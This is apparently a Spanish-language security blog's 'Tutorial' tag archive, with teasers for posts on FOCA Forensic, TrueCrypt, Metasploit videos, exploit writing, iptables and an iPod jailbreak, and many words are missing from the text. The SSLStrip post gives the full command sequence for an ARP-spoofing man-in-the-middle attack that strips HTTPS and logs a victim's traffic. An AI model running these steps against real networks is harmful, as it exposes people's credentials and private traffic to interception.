Archivos de Etiquetas: Tutorial

Manual NO Oficial de la FOCA Forensic

La Forensic es una nueva de la suite “FOCA” (ya tenemos la FOCA Classic, La y pronto la Evil FOCA) que los chicos de informatica64 crearon para facilitarle la vida a los investigadores forenses a la hora de extraer y analizar los meta datos de un conjunto de documentos.

Analizar grandes cantidades de documentos sin un sistema de automatización que nos ayude es algo complicado y que requiere de mucho tiempo en una investigación forense digital, por eso una herramienta como la FOCA Forensic es tan útil en estos casos, con este texto se pretende crear un NO OFICIAL de esta herramienta, para sacar el máximo provecho de ella y extender su utilización.

Leer más…

TrueCrypt – Cifra tu información en particiones virtuales

TrueCrypt es una aplicación gratuita y de que nos permite crear particiones cifradas virtuales, donde podemos almacenar toda nuestra informacion sensible para que solo quien cuente con la contraseña correcta o el archivo de clave pueda acceder a ella.

Esta aplicación se ha vuelto realmente popular, ya que cuenta con muchas características que la hacen resaltar frente a comerciales similares, es multiplataforma (de momento Windows, GNU Linux y Max OS X), permite cifrar con una gran cantidad de algoritmos (AES, TWOFISH, SERPENT, etc..), sencillo de manejar e instalar (ver tutorial de TrueCrypt en la comundiad), permite cifrar múltiples medios ( duros, USB, ’s, CD’s, etc..) y todo esto totalmente . Leer más…

SSLStrip – Espiando tráfico SSL

Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta cualquier persona puede tu trafico sin problemas.

El funcionamiento de es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

En resumen, los pasos serian:

1. Configurar IP Forwarding:

echo 1 > /proc/sys/net//ip_forward

2. Realizando ataque ARP MITM entre las 2 maquinas:

arpspoof -i eth0 -t VICTIMA HOST

3. Redireccionar trafico con :

iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

4. Iniciar SSLStrip en el puerto utilizado

python sslstrip.py -w archivo

Espero que les sea de utilidad y no olviden comentar

Mas Información:
Pagina Oficial del SSLStrip

Video Tutoriales de Metasploit Framework

El 8 de mayo de 2010, la AISS Kentuckiana realizó una capacitación de siete horas en el Brown Hotel de Louisville Kentucky Las ganancias recaudadas en la capacitación fue para el programa de Alimentos por Trabajo de “Hackers For Charity”. Los instructores fueron David “ReL1K” Kennedy, Martin “PureHate” Bos, Elliott “Nullthreat” Cutright, Pwrcycle y Adrian “Irongeek” Crenshaw.

A continuación se muestran los vídeos del evento. Espero que los disfruten. Leer más…

Manual de Metasploit Framework en Español

Gracias a un comentario de hackmaf en el articulo Curso Completo de Metasploit Framework me entero de una iniciativa bastante interesante iniciada por Jhyx en su blog y organizada en -es.com.ar, con la que un grupo de personas, interesados por la seguridad informática, pretende traducir los manuales del al .

La traducción al español del de , esta publicado en formato WIKI (a diferencia que la original en ingles) y por lo cual podemos colaborar conjuntamente para tener pronto toda la guía “Metasploit Unleashed – Mastering the Framework” en nuestro idioma. Leer más…

Creando un Exploit Paso a Paso

¿ encontrar vulnerabilidades, escribir código shell,  aprovechar la vulnerabilidad encontrada y finalmente, convertirlo en un módulo de ?, son algunas de las interrogantes que alguna vez nos hemos realizado y David Hoelzer , Senior Fellow en el Instituto SANS  nos las resuelve con esta serie de vídeo .

En los siguientes videoturiales, aprenderemos de la mano de David Hoelzer, como crear un paso a paso y convertirlo en un modulo de Metasploit para después utilizarlo con este excelente ; aunque los vídeos se encuentran en ingles, son bastante prácticos y visuales, con lo que no tendremos ningún problema al seguirlos. Leer más…

Vídeo Tutorial de IPTables

El componente más popular construido sobre es , una de cortafuegos que permite no solamente filtrar paquetes, sino también realizar traducción de direcciones de red (NAT) para o mantener registros de log. El proyecto ofrecía compatibilidad hacia atrás con hasta hace relativamente poco, aunque hoy día dicho soporte ya ha sido retirado al considerarse una obsoleta. El proyecto no sólo ofrece componentes disponibles como módulos del núcleo sino que también ofrece herramientas de espacio de usuario y librerías.

En esta ocasión nuestro amigoDinosaurio nos envia una serie de vídeo donde nos enseña a , configurar y poner a prueba nuestro con iptables. Leer más…

Desbloquear iPod Touch 2G Fácilmente

Desbloquea (Jailbreak) o Actualiza el iPhone OS 3.0 para iPhone y iPod Touch

Un nuevo metodo para aun mas facilmente el , ha sido publicado en la comunidad por hecky, para verla click aqui

Después que MuscleNerd anunciara el parche definitivo para desbloquear el iPod Touch 2G (sin tener que reiniciar), han tardado poco en aparecer diversas que permiten realizar este proceso fácilmente, una de ellas es  QuickFreedom de la cual me entere gracias a los comentarios de @jorge, @m4st3rcr4zy y@feranmx, la cual será la que utilizare para llevar a cabo este de desbloqueo final del Touch 2G.

¿Que Necesitamos para Desbloquear el iPod Touch 2G?

Antes de realizar cualquier procedimiento es recomendable que sincronicemos nuestros datos del ipod touch con el itunes, también que descarguemos nuestras aplicaciones haciendo click en (Archivo/Transferir compras de “nombre de tu ipod touch”) para que perdamos la menor cantidad de información posible en este proceso, si no llevas a cabo esta recomendación antes de realizar el desbloqueo () de tu ipod touch perderás cualquier información que tengas en el. Leer más…